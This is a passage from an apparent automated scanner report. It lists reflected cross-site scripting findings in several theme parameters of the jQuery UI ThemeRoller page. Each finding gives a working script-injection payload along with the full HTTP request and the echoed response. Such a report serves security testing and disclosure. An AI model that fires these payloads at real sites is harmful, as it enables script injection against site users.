The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c64ac"><script>alert(1)</script>9179f8285de was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0c64ac"><script>alert(1)</script>9179f8285de&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0c64ac"><script>alert(1)</script>9179f8285de&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

4.48. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d0d"><script>alert(1)</script>32e75550ce7 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0c9d0d"><script>alert(1)</script>32e75550ce7&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0c9d0d"><script>alert(1)</script>32e75550ce7&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.49. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e7a"><script>alert(1)</script>363200d54d4 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png43e7a"><script>alert(1)</script>363200d54d4&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png43e7a"><script>alert(1)</script>363200d54d4&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

4.50. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75604"><script>alert(1)</script>ba263e0ed7c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png75604"><script>alert(1)</script>ba263e0ed7c&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png75604"><script>alert(1)</script>ba263e0ed7c&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefaul
...[SNIP]...

4.51. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9556f"><script>alert(1)</script>e4c26e517e3 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png9556f"><script>alert(1)</script>e4c26e517e3&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png9556f"><script>alert(1)</script>e4c26e517e3&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&ic
...[SNIP]...

4.52. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ba1"><script>alert(1)</script>72d1a61f66b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png86ba1"><script>alert(1)</script>72d1a61f66b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png86ba1"><script>alert(1)</script>72d1a61f66b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

4.53. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad96"><script>alert(1)</script>adb4bcaf6ab was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png6ad96"><script>alert(1)</script>adb4bcaf6ab&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png6ad96"><script>alert(1)</script>adb4bcaf6ab&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcConte
...[SNIP]...

4.54. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd60"><script>alert(1)</script>1fc4e4ea6f4 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngbdd60"><script>alert(1)</script>1fc4e4ea6f4&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngbdd60"><script>alert(1)</script>1fc4e4ea6f4&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

4.55. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119b8"><script>alert(1)</script>1d4c850f75b was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png119b8"><script>alert(1)</script>1d4c850f75b&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png119b8"><script>alert(1)</script>1d4c850f75b&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009
...[SNIP]...

